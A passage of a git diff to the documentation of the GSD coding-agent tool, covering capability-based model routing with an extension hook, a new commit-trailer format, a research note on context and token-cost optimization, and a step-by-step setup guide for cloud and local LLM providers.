+**Profiles are heuristic rankings, not benchmarks.** They represent approximate relative strengths, not verified benchmark results. Use user overrides (below) to correct them for models you know well. 
+ +## How Scoring Works + +The routing pipeline within a tier: + +``` +classify complexity tier + ↓ +filter eligible models for tier + ↓ +fire before_model_select hook (optional override) + ↓ +capability score eligible models + ↓ +select winner (or first eligible if scoring is disabled) +``` + +**Scoring formula:** weighted average of capability dimensions + +``` +score = Σ(weight × capability) / Σ(weights) +``` + +**Task requirements** are dynamic — different task types weight dimensions differently: + +| Unit Type | Key Dimensions | +|-----------|---------------| +| `execute-task` | coding (0.9), instruction (0.7), speed (0.3) | +| `research-*` | research (0.9), longContext (0.7), reasoning (0.5) | +| `plan-*` | reasoning (0.9), coding (0.5) | +| `replan-slice` | reasoning (0.9), debugging (0.6), coding (0.5) | +| `complete-slice`, `run-uat` | instruction (0.8), speed (0.7) | + +For `execute-task`, requirements are further refined by task metadata signals: +- Tags like `docs`, `config`, `readme` → boost instruction weight +- Keywords like `concurrency`, `compatibility` → boost debugging and reasoning +- Keywords like `migration`, `architecture` → boost reasoning and coding +- Large file counts (≥6) or large estimated line counts (≥500) → boost coding and reasoning + +**Tie-breaking:** When two models score within 2 points of each other, the cheaper model wins. If costs are equal, lexicographic model ID breaks the tie (deterministic). + +## User Overrides + +Correct built-in capability profiles for models you know well using `modelOverrides` in your models configuration: + +```json +{ + "providers": { + "anthropic": { + "modelOverrides": { + "claude-sonnet-4-6": { + "capabilities": { + "debugging": 90, + "research": 85 + } + } + } + } + } +} +``` + +Overrides are **deep-merged** with built-in defaults — only the specified dimensions are overridden; others retain their built-in values. 
+ +**Use case:** You've found that a model consistently outperforms its built-in profile on specific task types. Override the relevant dimensions to steer the router toward that model for those tasks. + +## Verbose Output + +When verbose mode is active, the router logs its routing decision. When capability scoring was used, the log includes a full scoring breakdown: + +``` +Dynamic routing [S]: claude-sonnet-4-6 (capability-scored) — claude-sonnet-4-6: 82.3, gpt-4o: 78.1, deepseek-chat: 72.0 +``` + +When tier-only routing was used (scoring disabled, single eligible model, or routing guards applied): + +``` +Dynamic routing [S]: claude-sonnet-4-6 (standard complexity, multiple steps) +``` + +The `selectionMethod` field in the routing decision indicates which path was taken: +- `"capability-scored"` — capability scoring selected the winner +- `"tier-only"` — cheapest in tier (or explicit pin) was used + +## Extension Hook + +Extensions can intercept and override model selection using the `before_model_select` hook. + +The hook fires **after** tier filtering (eligible models are known) and **before** capability scoring (scores have not been computed yet). A hook can override selection entirely or return `undefined` to let scoring proceed normally. 
 
+
+**Registering a handler:**
+
+```typescript
+pi.on("before_model_select", async (event) => {
+  const { unitType, unitId, classification, taskMetadata, eligibleModels, phaseConfig } = event;
+
+  // Custom routing strategy: always use gemini for research tasks
+  if (unitType.startsWith("research-")) {
+    const gemini = eligibleModels.find(id => id.includes("gemini"));
+    if (gemini) return { modelId: gemini };
+  }
+
+  // Return undefined to let capability scoring proceed
+  return undefined;
+});
+```
+
+**Event payload:**
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `unitType` | `string` | The unit type being dispatched (e.g., `"execute-task"`) |
+| `unitId` | `string` | Unique identifier for this unit dispatch |
+| `classification` | `{ tier, reason, downgraded }` | The complexity classification result |
+| `taskMetadata` | `Record<string, unknown> \| undefined` | Task metadata extracted from the unit plan |
+| `eligibleModels` | `string[]` | Models eligible for the classified tier |
+| `phaseConfig` | `{ primary, fallbacks } \| undefined` | The user's configured model for this phase |
+
+**Return value:** `{ modelId: string }` to override selection, or `undefined` to defer to capability scoring.
+
+**First-override-wins:** If multiple extensions register handlers, the first one to return a non-undefined result wins. Subsequent handlers are not called.
+
 ## Complexity Classification
 
 Units are classified using pure heuristics — no LLM calls, sub-millisecond:
diff --git a/docs/getting-started.md b/docs/getting-started.md
index bd79f868e..6fbcf2422 100644
--- a/docs/getting-started.md
+++ b/docs/getting-started.md
@@ -39,6 +39,10 @@ GSD is also available as a VS Code extension. Install from the marketplace (publ
 
 The CLI (`gsd-pi`) must be installed first — the extension connects to it via RPC.
 
+### Web Interface
+
+GSD also has a browser-based interface. 
Run `gsd --web` to start a local web server with a visual dashboard, real-time progress, and multi-project support. See [Web Interface](./web-interface.md) for details. + ## First Launch Run `gsd` in any directory: @@ -54,6 +58,8 @@ GSD displays a welcome screen showing your version, active model, and available If you have an existing Pi installation, provider credentials are imported automatically. +For detailed setup instructions for specific providers (OpenRouter, Ollama, LM Studio, vLLM, and more), see the [Provider Setup Guide](./providers.md). + Re-run the wizard anytime with: ```bash diff --git a/docs/git-strategy.md b/docs/git-strategy.md index 40576256f..c8274b7d0 100644 --- a/docs/git-strategy.md +++ b/docs/git-strategy.md @@ -36,10 +36,10 @@ Use this for hot-reload workflows where file isolation breaks dev tooling (e.g., main ───────────────────────────────────────────────────────── │ ↑ └── milestone/M001 (worktree) ────────────────────────┘ - commit: feat(S01/T01): core types - commit: feat(S01/T02): markdown parser - commit: feat(S01/T03): file writer - commit: docs(M001/S01): workflow docs + commit: feat: core types + commit: feat: markdown parser + commit: feat: file writer + commit: docs: workflow docs ... 
→ squash-merged to main as single commit ``` @@ -56,13 +56,13 @@ With [parallel orchestration](./parallel-orchestration.md) enabled, multiple mil main ────────────────────────────────────────────────────────── │ ↑ ↑ ├── milestone/M002 (worktree) ─────────┘ │ - │ commit: feat(S01/T01): auth types │ - │ commit: feat(S01/T02): JWT middleware │ + │ commit: feat: auth types │ + │ commit: feat: JWT middleware │ │ → squash-merged first │ │ │ └── milestone/M003 (worktree) ────────────────────────┘ - commit: feat(S01/T01): dashboard layout - commit: feat(S01/T02): chart components + commit: feat: dashboard layout + commit: feat: chart components → squash-merged second ``` @@ -75,13 +75,16 @@ Each worktree operates on its own branch with its own commit history. Merges hap ### Commit Format -Commits use conventional commit format with scope: +Commits use conventional commit format with GSD metadata in trailers: ``` -feat(S01/T01): core type definitions -feat(S01/T02): markdown parser for plan files -fix(M001/S03): bug fixes and doc corrections -docs(M001/S04): workflow documentation +feat: core type definitions + +GSD-Task: M001/S01/T01 + +feat: markdown parser for plan files + +GSD-Task: M001/S01/T02 ``` ## Worktree Management diff --git a/docs/parallel-orchestration.md b/docs/parallel-orchestration.md index 6b611291d..40463fa95 100644 --- a/docs/parallel-orchestration.md +++ b/docs/parallel-orchestration.md @@ -126,7 +126,7 @@ File overlaps are warnings, not blockers. 
Both milestones work in separate workt ## Configuration -Add to `~/.gsd/preferences.md` or `.gsd/preferences.md`: +Add to `~/.gsd/PREFERENCES.md` or `.gsd/PREFERENCES.md`: ```yaml --- diff --git a/docs/pi-context-optimization-opportunities.md b/docs/pi-context-optimization-opportunities.md new file mode 100644 index 000000000..9e34cc44c --- /dev/null +++ b/docs/pi-context-optimization-opportunities.md @@ -0,0 +1,198 @@ +# pi-coding-agent: Context Optimization Opportunities + +> **Status**: Research only — not planned for implementation. +> Scope: `packages/pi-coding-agent` and `packages/pi-agent-core` infrastructure. +> These changes would benefit every consumer of the pi engine, not just GSD. + +--- + +## 1. Prompt Caching (`cache_control`) — Highest Impact + +**Current state**: Every LLM call re-pays full input token cost for the system prompt, tool definitions, and context files. No `cache_control` breakpoints are set anywhere in the API call path. + +**Opportunity**: Anthropic's KV cache delivers 90% cost reduction on cached tokens (0.1x input rate). Claude Code achieves 92–98% cache hit rates by placing stable content before volatile content. + +**Where to instrument** (`packages/pi-ai/src/providers/anthropic.ts`): +- Set `cache_control: { type: "ephemeral" }` on the last tool definition block +- Set `cache_control` after the static system prompt sections (base boilerplate + context files) +- Leave the per-turn user message uncached + +**Critical constraint**: The cache breakpoint must be placed *after* all static content and *before* any dynamic content (timestamps, per-request variables). Moving a timestamp before a cache breakpoint defeats it on every call. + +**Cache hierarchy**: Tools → system → messages. Changing a tool definition invalidates system and message caches. Tool definitions should be sorted deterministically (alphabetically) to prevent spurious cache misses. 
+ +**Expected savings**: 80–90% reduction in input token cost for multi-turn sessions (the dominant cost pattern in GSD auto-mode). + +--- + +## 2. Observation Masking in the Message Pipeline + +**Current state**: `agent-loop.ts` passes the full `context.messages` array to the LLM on every turn. Tool results from 50 turns ago are re-read in full on every subsequent call. The `transformContext` hook exists on `AgentContext` and fires before every LLM call, but has no default implementation — extensions are responsible for any pruning. + +**Opportunity**: Replace old tool result content with lightweight placeholders after N turns. JetBrains Research tested this on SWE-bench Verified (500 tasks, up to 250-turn trajectories) and found: +- 50%+ cost reduction vs. unmanaged history +- Performance matched or slightly exceeded LLM summarization +- Zero overhead (no extra LLM call required) + +**Proposed implementation** (default `transformContext` in `pi-agent-core`): +```typescript +// Keep last KEEP_RECENT_TURNS verbatim; mask older tool results +const KEEP_RECENT_TURNS = 8; + +function defaultObservationMask(messages: AgentMessage[]): AgentMessage[] { + const cutoff = findTurnBoundary(messages, KEEP_RECENT_TURNS); + return messages.map((m, i) => { + if (i >= cutoff) return m; + if (m.type === "toolResult" || m.type === "bashExecution") { + return { ...m, content: "[result masked — within summarized history]", excludeFromContext: false }; + } + return m; + }); +} +``` + +**Compaction interaction**: Observation masking reduces the token accumulation rate, pushing the compaction threshold further out. The two mechanisms are complementary — masking handles the steady state, compaction handles the rare deep-session case. + +--- + +## 3. 
Earlier Compaction Threshold + +**Current state** (`packages/pi-coding-agent/src/core/constants.ts`): +```typescript +COMPACTION_RESERVE_TOKENS = 16_384 // triggers at contextWindow - 16K +COMPACTION_KEEP_RECENT_TOKENS = 20_000 +``` + +For a 200K context window, compaction fires at ~183K tokens — 91.5% utilization. + +**Problem**: Context drift (not raw exhaustion) causes ~65% of enterprise agent failures. Performance degrades measurably beyond ~30K tokens per Zylos production data. The current threshold lets sessions run degraded for a long stretch before compaction fires. + +**Opportunity**: Lower the trigger to 70% utilization. For a 200K window, this means compacting at ~140K tokens — 43K tokens earlier. + +```typescript +// Proposed +COMPACTION_THRESHOLD_PERCENT = 0.70 // fire at 70% of contextWindow +COMPACTION_RESERVE_TOKENS = contextWindow * (1 - COMPACTION_THRESHOLD_PERCENT) +``` + +**Trade-off**: More frequent compactions, each happening earlier when there's more "fresh" content to keep. Summary quality improves because less material needs to be discarded at each cut. + +--- + +## 4. Tool Result Truncation at Write Time + +**Current state**: `TOOL_RESULT_MAX_CHARS = 2_000` in `constants.ts`, but this limit is only applied *during compaction summarization*, not when the tool result enters the message store. A bash result returning 50KB of log output is stored and re-sent verbatim until compaction fires. + +**Opportunity**: Truncate at write time in `messages.ts` → `convertToLlm()` or in the tool result handler. Two strategies: + +- **Hard truncation**: Slice at N chars, append `"\n[truncated — {original_length} chars]"`. Simple, zero overhead. +- **Semantic head/tail**: Keep first 500 chars (context, command echo) + last 1000 chars (final output, errors). Better for bash results where the end contains the error. + +**Recommendation**: Semantic head/tail as the default, configurable per tool type. 
File read results benefit from head; bash/test output benefits from head+tail.
+
+---
+
+## 5. Context File Deduplication and Trim
+
+**Current state** (`packages/pi-coding-agent/src/core/resource-loader.ts`, lines 84–109):
+- Searches from `~/.gsd/agent/` → ancestor dirs → cwd
+- Deduplicates by *file path* but not by *content*
+- Entire file content concatenated verbatim into system prompt — no trimming, no summarization
+
+**Anti-pattern**: A project with AGENTS.md at 3 ancestor levels (repo root, workspace, home) injects all three in full. If they share common boilerplate, that content is re-injected multiple times.
+
+**Opportunities**:
+1. **Content deduplication**: Hash paragraph-level chunks; skip any chunk already seen in a previously-loaded file
+2. **Section-aware loading**: Parse `## ` headings in AGENTS.md; only include sections relevant to the current task type (e.g., `## Testing` section only when running tests)
+3. **Token budget enforcement**: If total context files exceed N tokens, summarize oldest/most-distant file rather than including verbatim
+
+---
+
+## 6. Skill Content Lazy Loading and Summarization
+
+**Current state**: When `/skill:name` is invoked, the full skill file content is injected inline as `<skill>...</skill>` in the user message. No chunking, no summarization. A 10KB skill file adds ~2,500 tokens to that turn.
+
+**Opportunity**:
+- **Cached skill injection**: If the same skill is used across multiple turns (rare but possible), it's re-injected each time. Cache with `cache_control` after first injection.
+- **Skill digest mode**: Inject a 200-token summary of the skill on first reference; full content only if the model requests it via a `get_skill_detail` tool call. Reduces cost for skills that don't end up being followed.
+- **Skill prefetching**: Before a known long session (e.g., auto-mode start), pre-inject all likely skills with `cache_control` so they're cached for the entire session.
+
+---
+
+## 7. 
Token Estimation Accuracy
+
+**Current state** (`compaction.ts`, line 216): `chars / 4` heuristic. This underestimates token count for English prose (~3.5 chars/token) and underestimates even more for code with short identifiers or Unicode.
+
+**Opportunity**: Use a proper tokenizer.
+- `@anthropic-ai/tokenizer` (tiktoken-compatible, ships with the SDK) — accurate but ~5ms per call
+- Tiered approach: use chars/4 for display; use proper tokenizer only for compaction threshold decisions (where accuracy matters)
+
+**Impact**: More accurate compaction timing, fewer unnecessary compactions, slightly better `COMPACTION_KEEP_RECENT_TOKENS` boundary placement.
+
+---
+
+## 8. Format: Markdown over XML for Internal Context
+
+**Current state**: The message pipeline uses XML tag wrappers in several places. System prompt sections are largely prose Markdown.
+
+**Findings**: XML tags carry 15–40% more tokens than equivalent Markdown for the same semantic content, due to paired open/close tags. However, Claude was optimized for XML and shows higher accuracy on tasks requiring precise section parsing.
+
+**Recommendation**: Audit XML usage in the pipeline and convert to Markdown where the content is:
+- Non-nested (flat instructions, status messages)
+- Human-readable rather than machine-parsed by the model
+- Not requiring precise boundary detection
+
+Keep XML for: few-shot examples with ambiguous boundaries, skill content (requires precise isolation from surrounding text), compaction summaries that the model must treat as authoritative history.
+
+**Estimated savings**: 5–15% reduction in system prompt token count.
+
+---
+
+## 9. Dynamic Tool Set Delivery
+
+**Current state**: All tool definitions are included in every LLM request. Tool descriptions consume 60–80% of input tokens in static configurations. As new extensions register tools, the baseline grows linearly.
+
+**Opportunity** (higher complexity): Implement the three-function Dynamic Toolset pattern:
+1. 
`search_tools(query)` — semantic search over tool catalog +2. `describe_tools(ids[])` — fetch full schemas on demand +3. `execute_tool(id, params)` — unchanged execution + +Speakeasy measured 91–97% token reduction with 100% task success rate. Trade-off: 2–3x more tool calls, ~50% longer wall time. Net cost dramatically lower. + +**Feasibility for pi**: The tool registry (`packages/pi-coding-agent/src/core/tool-registry.ts`) already stores tool metadata separately from definitions. The primary engineering work is the semantic search index and the `describe_tools` / `search_tools` tool implementations. + +--- + +## 10. Cost Attribution and Per-Phase Reporting + +**Current state**: `SessionManager.getUsageTotals()` accumulates cost across the entire session. No per-phase or per-agent breakdown is stored. Cost visibility is limited to the footer total and `GSD_SHOW_TOKEN_COST=1` per-turn display. + +**Opportunity**: Emit structured cost events that extensions can subscribe to: +```typescript +interface CostCheckpointEvent { + type: "cost_checkpoint"; + label: string; // "discuss-phase", "execute-slice-3" + deltaTokens: Usage; // tokens since last checkpoint + cumulativeTokens: Usage; + cumulativeCost: number; +} +``` + +GSD extension could consume these events to surface per-milestone cost in `/gsd stats` and flag milestones that are disproportionately expensive — enabling budget-aware planning. 
+ +--- + +## Implementation Ordering (if pursued) + +| Priority | Item | Effort | Expected Impact | +|----------|------|--------|-----------------| +| 1 | Prompt caching (`cache_control`) | Low | 80–90% input cost reduction | +| 2 | Earlier compaction threshold (70%) | Trivial | Reduces drift in long sessions | +| 3 | Tool result truncation at write time | Low | Reduces context bloat between compactions | +| 4 | Context file deduplication | Medium | Variable — high for multi-level AGENTS.md setups | +| 5 | Observation masking (default `transformContext`) | Medium | 50%+ on long-running agents | +| 6 | Token estimation (proper tokenizer) | Low | Accuracy improvement, minor cost impact | +| 7 | Markdown over XML audit | Low | 5–15% system prompt reduction | +| 8 | Skill caching with `cache_control` | Low | Meaningful for skill-heavy sessions | +| 9 | Dynamic tool set delivery | High | 90%+ on large tool catalogs; major architecture change | +| 10 | Per-phase cost attribution events | Medium | Visibility only; enables future budget routing | diff --git a/docs/pr-1530/01-full.png b/docs/pr-1530/01-full.png deleted file mode 100644 index 032098a0a..000000000 Binary files a/docs/pr-1530/01-full.png and /dev/null differ diff --git a/docs/pr-1530/02-small.png b/docs/pr-1530/02-small.png deleted file mode 100644 index 7221c0d76..000000000 Binary files a/docs/pr-1530/02-small.png and /dev/null differ diff --git a/docs/pr-1530/03-min.png b/docs/pr-1530/03-min.png deleted file mode 100644 index 4e93052a9..000000000 Binary files a/docs/pr-1530/03-min.png and /dev/null differ diff --git a/docs/pr-1530/04-unhealthy.png b/docs/pr-1530/04-unhealthy.png deleted file mode 100644 index 2d62e88be..000000000 Binary files a/docs/pr-1530/04-unhealthy.png and /dev/null differ diff --git a/docs/pr-876/01-index.png b/docs/pr-876/01-index.png deleted file mode 100644 index dc2957b92..000000000 Binary files a/docs/pr-876/01-index.png and /dev/null differ diff --git a/docs/pr-876/02-summary.png 
b/docs/pr-876/02-summary.png deleted file mode 100644 index dea9d8cb1..000000000 Binary files a/docs/pr-876/02-summary.png and /dev/null differ diff --git a/docs/pr-876/03-progress.png b/docs/pr-876/03-progress.png deleted file mode 100644 index 9dec3856b..000000000 Binary files a/docs/pr-876/03-progress.png and /dev/null differ diff --git a/docs/pr-876/04-depgraph.png b/docs/pr-876/04-depgraph.png deleted file mode 100644 index b1349dead..000000000 Binary files a/docs/pr-876/04-depgraph.png and /dev/null differ diff --git a/docs/pr-876/05-metrics.png b/docs/pr-876/05-metrics.png deleted file mode 100644 index bb8083030..000000000 Binary files a/docs/pr-876/05-metrics.png and /dev/null differ diff --git a/docs/pr-876/06-changelog.png b/docs/pr-876/06-changelog.png deleted file mode 100644 index c79e00f2d..000000000 Binary files a/docs/pr-876/06-changelog.png and /dev/null differ diff --git a/docs/pr-876/06-timeline.png b/docs/pr-876/06-timeline.png deleted file mode 100644 index 62d081703..000000000 Binary files a/docs/pr-876/06-timeline.png and /dev/null differ diff --git a/docs/pr-876/07-changelog.png b/docs/pr-876/07-changelog.png deleted file mode 100644 index f279f6d95..000000000 Binary files a/docs/pr-876/07-changelog.png and /dev/null differ diff --git a/docs/pr-876/07-knowledge.png b/docs/pr-876/07-knowledge.png deleted file mode 100644 index 2e7e32952..000000000 Binary files a/docs/pr-876/07-knowledge.png and /dev/null differ diff --git a/docs/pr-876/08-knowledge.png b/docs/pr-876/08-knowledge.png deleted file mode 100644 index 14a4dd33b..000000000 Binary files a/docs/pr-876/08-knowledge.png and /dev/null differ diff --git a/docs/pr-876/09-captures.png b/docs/pr-876/09-captures.png deleted file mode 100644 index f3c29a40e..000000000 Binary files a/docs/pr-876/09-captures.png and /dev/null differ diff --git a/docs/pr-876/10-artifacts.png b/docs/pr-876/10-artifacts.png deleted file mode 100644 index 7aab45ec9..000000000 Binary files 
a/docs/pr-876/10-artifacts.png and /dev/null differ diff --git a/docs/providers.md b/docs/providers.md new file mode 100644 index 000000000..984ee369c --- /dev/null +++ b/docs/providers.md @@ -0,0 +1,587 @@ +# Provider Setup Guide + +Step-by-step setup instructions for every LLM provider GSD supports. If you ran the onboarding wizard (`gsd config`) and picked a provider, you may already be configured — check with `/model` inside a session. + +## Table of Contents + +- [Quick Reference](#quick-reference) +- [Built-in Providers](#built-in-providers) + - [Anthropic (Claude)](#anthropic-claude) + - [OpenAI](#openai) + - [Google Gemini](#google-gemini) + - [OpenRouter](#openrouter) + - [Groq](#groq) + - [xAI (Grok)](#xai-grok) + - [Mistral](#mistral) + - [GitHub Copilot](#github-copilot) + - [Amazon Bedrock](#amazon-bedrock) + - [Anthropic on Vertex AI](#anthropic-on-vertex-ai) + - [Azure OpenAI](#azure-openai) +- [Local Providers](#local-providers) + - [Ollama](#ollama) + - [LM Studio](#lm-studio) + - [vLLM](#vllm) + - [SGLang](#sglang) +- [Custom OpenAI-Compatible Endpoints](#custom-openai-compatible-endpoints) +- [Common Pitfalls](#common-pitfalls) +- [Verifying Your Setup](#verifying-your-setup) + +## Quick Reference + +| Provider | Auth Method | Env Variable | Config File | +|----------|-------------|-------------|-------------| +| Anthropic | OAuth or API key | `ANTHROPIC_API_KEY` | — | +| OpenAI | API key | `OPENAI_API_KEY` | — | +| Google Gemini | API key | `GEMINI_API_KEY` | — | +| OpenRouter | API key | `OPENROUTER_API_KEY` | Optional `models.json` | +| Groq | API key | `GROQ_API_KEY` | — | +| xAI | API key | `XAI_API_KEY` | — | +| Mistral | API key | `MISTRAL_API_KEY` | — | +| GitHub Copilot | OAuth | `GH_TOKEN` | — | +| Amazon Bedrock | IAM credentials | `AWS_PROFILE` or `AWS_ACCESS_KEY_ID` | — | +| Vertex AI | ADC | `GOOGLE_APPLICATION_CREDENTIALS` | — | +| Azure OpenAI | API key | `AZURE_OPENAI_API_KEY` | — | +| Ollama | None (local) | — | `models.json` 
required | +| LM Studio | None (local) | — | `models.json` required | +| vLLM / SGLang | None (local) | — | `models.json` required | + +--- + +## Built-in Providers + +Built-in providers have models pre-registered in GSD. You only need to supply credentials. + +### Anthropic (Claude) + +**Recommended.** Anthropic models have the deepest integration: built-in web search, extended thinking, and prompt caching. + +**Option A — Browser sign-in (recommended):** + +```bash +gsd config +# Choose "Sign in with your browser" → "Anthropic (Claude)" +``` + +Or inside a session: `/login` + +**Option B — API key:** + +```bash +export ANTHROPIC_API_KEY="sk-ant-..." +``` + +Or paste it during `gsd config` when prompted. + +**Get a key:** [console.anthropic.com/settings/keys](https://console.anthropic.com/settings/keys) + +### OpenAI + +```bash +export OPENAI_API_KEY="sk-..." +``` + +Or run `gsd config` and choose "Paste an API key" then "OpenAI". + +**Get a key:** [platform.openai.com/api-keys](https://platform.openai.com/api-keys) + +### Google Gemini + +```bash +export GEMINI_API_KEY="..." +``` + +**Get a key:** [aistudio.google.com/app/apikey](https://aistudio.google.com/app/apikey) + +### OpenRouter + +OpenRouter aggregates 200+ models from multiple providers behind a single API key. + +**Step 1 — Get your API key:** + +Go to [openrouter.ai/keys](https://openrouter.ai/keys) and create a key. + +**Step 2 — Set the key:** + +```bash +export OPENROUTER_API_KEY="sk-or-..." +``` + +Or run `gsd config`, choose "Paste an API key", then "OpenRouter". + +**Step 3 — Switch to an OpenRouter model:** + +Inside a GSD session, type `/model` and select an OpenRouter model. Models are prefixed with `openrouter/` (e.g., `openrouter/anthropic/claude-sonnet-4`). 
+ +**Optional — Add custom OpenRouter models via `models.json`:** + +If you want models not in the built-in list, add them to `~/.gsd/agent/models.json`: + +```json +{ + "providers": { + "openrouter": { + "baseUrl": "https://openrouter.ai/api/v1", + "apiKey": "OPENROUTER_API_KEY", + "api": "openai-completions", + "models": [ + { + "id": "meta-llama/llama-3.3-70b", + "name": "Llama 3.3 70B (OpenRouter)", + "reasoning": false, + "input": ["text"], + "contextWindow": 131072, + "maxTokens": 32768, + "cost": { "input": 0.3, "output": 0.3, "cacheRead": 0, "cacheWrite": 0 } + } + ] + } + } +} +``` + +Note: the `apiKey` field here is the *name* of the environment variable, not the literal key. GSD resolves it automatically. You can also use a literal value or a shell command (see [Value Resolution](./custom-models.md#value-resolution)). + +**Optional — Route through specific providers:** + +Use `modelOverrides` to control which upstream provider OpenRouter uses: + +```json +{ + "providers": { + "openrouter": { + "modelOverrides": { + "anthropic/claude-sonnet-4": { + "compat": { + "openRouterRouting": { + "only": ["amazon-bedrock"] + } + } + } + } + } + } +} +``` + +### Groq + +```bash +export GROQ_API_KEY="gsk_..." +``` + +**Get a key:** [console.groq.com/keys](https://console.groq.com/keys) + +### xAI (Grok) + +```bash +export XAI_API_KEY="xai-..." +``` + +**Get a key:** [console.x.ai](https://console.x.ai) + +### Mistral + +```bash +export MISTRAL_API_KEY="..." +``` + +**Get a key:** [console.mistral.ai/api-keys](https://console.mistral.ai/api-keys) + +### GitHub Copilot + +Uses OAuth — sign in through the browser: + +```bash +gsd config +# Choose "Sign in with your browser" → "GitHub Copilot" +``` + +Requires an active GitHub Copilot subscription. + +### Amazon Bedrock + +Bedrock uses AWS IAM credentials, not API keys. Any of these work: + +```bash +# Option 1: Named profile +export AWS_PROFILE="my-profile" + +# Option 2: IAM keys +export AWS_ACCESS_KEY_ID="AKIA..." 
+export AWS_SECRET_ACCESS_KEY="..." +export AWS_REGION="us-east-1" + +# Option 3: Bedrock API key (bearer token) +export AWS_BEARER_TOKEN_BEDROCK="..." +``` + +ECS task roles and IRSA (Kubernetes) are also detected automatically. + +### Anthropic on Vertex AI + +Uses Google Cloud Application Default Credentials: + +```bash +gcloud auth application-default login +export ANTHROPIC_VERTEX_PROJECT_ID="my-project-id" +``` + +Or set `GOOGLE_CLOUD_PROJECT` and ensure ADC credentials exist at `~/.config/gcloud/application_default_credentials.json`. + +### Azure OpenAI + +```bash +export AZURE_OPENAI_API_KEY="..." +``` + +--- + +## Local Providers + +Local providers run on your machine. They require a `models.json` configuration file because GSD needs to know the endpoint URL and which models are available. + +**Config file location:** `~/.gsd/agent/models.json` + +The file reloads each time you open `/model` — no restart needed. + +### Ollama + +**Step 1 — Install and start Ollama:** + +```bash +# macOS +brew install ollama +ollama serve + +# Or download from https://ollama.com +``` + +**Step 2 — Pull a model:** + +```bash +ollama pull llama3.1:8b +ollama pull qwen2.5-coder:7b +``` + +**Step 3 — Create `~/.gsd/agent/models.json`:** + +```json +{ + "providers": { + "ollama": { + "baseUrl": "http://localhost:11434/v1", + "api": "openai-completions", + "apiKey": "ollama", + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false + }, + "models": [ + { "id": "llama3.1:8b" }, + { "id": "qwen2.5-coder:7b" } + ] + } + } +} +``` + +The `apiKey` is required by the config schema but Ollama ignores it — any value works. + +**Step 4 — Select the model:** + +Inside GSD, type `/model` and pick your Ollama model. + +**Ollama tips:** +- Ollama does not support the `developer` role or `reasoning_effort` — always set `compat.supportsDeveloperRole: false` and `compat.supportsReasoningEffort: false`. 
+- If you get empty responses, check that `ollama serve` is running and the model is pulled. +- Context window and max tokens default to 128K / 16K if not specified. Override these if your model has different limits. + +### LM Studio + +**Step 1 — Install LM Studio:** + +Download from [lmstudio.ai](https://lmstudio.ai). + +**Step 2 — Start the local server:** + +In LM Studio, go to the "Local Server" tab, load a model, and click "Start Server". The default port is 1234. + +**Step 3 — Create `~/.gsd/agent/models.json`:** + +```json +{ + "providers": { + "lm-studio": { + "baseUrl": "http://localhost:1234/v1", + "api": "openai-completions", + "apiKey": "lm-studio", + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false + }, + "models": [ + { + "id": "your-model-name", + "name": "My Local Model", + "contextWindow": 32768, + "maxTokens": 4096 + } + ] + } + } +} +``` + +Replace `your-model-name` with the model identifier shown in LM Studio's server tab. + +**LM Studio tips:** +- The model ID in `models.json` must match what LM Studio reports in its server API. Check the server tab for the exact string. +- LM Studio defaults to port 1234. If you changed it, update `baseUrl` accordingly. +- Increase `contextWindow` and `maxTokens` if your model supports larger contexts. + +### vLLM + +```json +{ + "providers": { + "vllm": { + "baseUrl": "http://localhost:8000/v1", + "api": "openai-completions", + "apiKey": "vllm", + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false, + "supportsUsageInStreaming": false + }, + "models": [ + { + "id": "meta-llama/Llama-3.1-8B-Instruct", + "contextWindow": 128000, + "maxTokens": 16384 + } + ] + } + } +} +``` + +The model `id` must match the `--model` flag you passed to `vllm serve`. 
+ +### SGLang + +```json +{ + "providers": { + "sglang": { + "baseUrl": "http://localhost:30000/v1", + "api": "openai-completions", + "apiKey": "sglang", + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false + }, + "models": [ + { + "id": "meta-llama/Llama-3.1-8B-Instruct" + } + ] + } + } +} +``` + +--- + +## Custom OpenAI-Compatible Endpoints + +Any server that implements the OpenAI Chat Completions API can work with GSD. This covers proxies (LiteLLM, Portkey, Helicone), self-hosted inference, and new providers. + +**Quickest path — use the onboarding wizard:** + +```bash +gsd config +# Choose "Paste an API key" → "Custom (OpenAI-compatible)" +# Enter: base URL, API key, model ID +``` + +This writes `~/.gsd/agent/models.json` for you automatically. + +**Manual setup:** + +```json +{ + "providers": { + "my-provider": { + "baseUrl": "https://my-endpoint.example.com/v1", + "apiKey": "MY_PROVIDER_API_KEY", + "api": "openai-completions", + "models": [ + { + "id": "model-id-here", + "name": "Friendly Model Name", + "reasoning": false, + "input": ["text"], + "contextWindow": 128000, + "maxTokens": 16384, + "cost": { "input": 0, "output": 0, "cacheRead": 0, "cacheWrite": 0 } + } + ] + } + } +} +``` + +**Adding custom headers (for proxies):** + +```json +{ + "providers": { + "litellm-proxy": { + "baseUrl": "https://litellm.example.com/v1", + "apiKey": "MY_API_KEY", + "api": "openai-completions", + "headers": { + "x-custom-header": "value" + }, + "models": [...] + } + } +} +``` + +**Qwen models with thinking mode:** + +For Qwen-compatible servers, use `thinkingFormat` to enable thinking mode: + +```json +{ + "compat": { + "thinkingFormat": "qwen", + "supportsDeveloperRole": false + } +} +``` + +Use `"qwen-chat-template"` instead if the server requires `chat_template_kwargs.enable_thinking`. + +For the full reference on `compat` fields, `modelOverrides`, value resolution, and advanced configuration, see [Custom Models](./custom-models.md). 
+ +--- + +## Common Pitfalls + +### "Authentication failed" with a valid key + +**Cause:** The key is set in your shell but not visible to GSD. + +**Fix:** Make sure the environment variable is exported in the same terminal where you run `gsd`. Or use `gsd config` to save the key to `~/.gsd/agent/auth.json` so it persists across sessions. + +### OpenRouter models not appearing in `/model` + +**Cause:** No `OPENROUTER_API_KEY` set, so GSD hides OpenRouter models. + +**Fix:** Set the key and restart GSD: + +```bash +export OPENROUTER_API_KEY="sk-or-..." +gsd +``` + +### Ollama returns empty responses + +**Cause:** Ollama server isn't running, or the model isn't pulled. + +**Fix:** + +```bash +# Verify the server is running +curl http://localhost:11434/v1/models + +# Pull the model if missing +ollama pull llama3.1:8b +``` + +### LM Studio model ID mismatch + +**Cause:** The `id` in `models.json` doesn't match what LM Studio exposes via its API. + +**Fix:** Check the LM Studio server tab for the exact model identifier. It often includes the filename or quantization level (e.g., `lmstudio-community/Meta-Llama-3.1-8B-Instruct-GGUF`). + +### `developer` role error with local models + 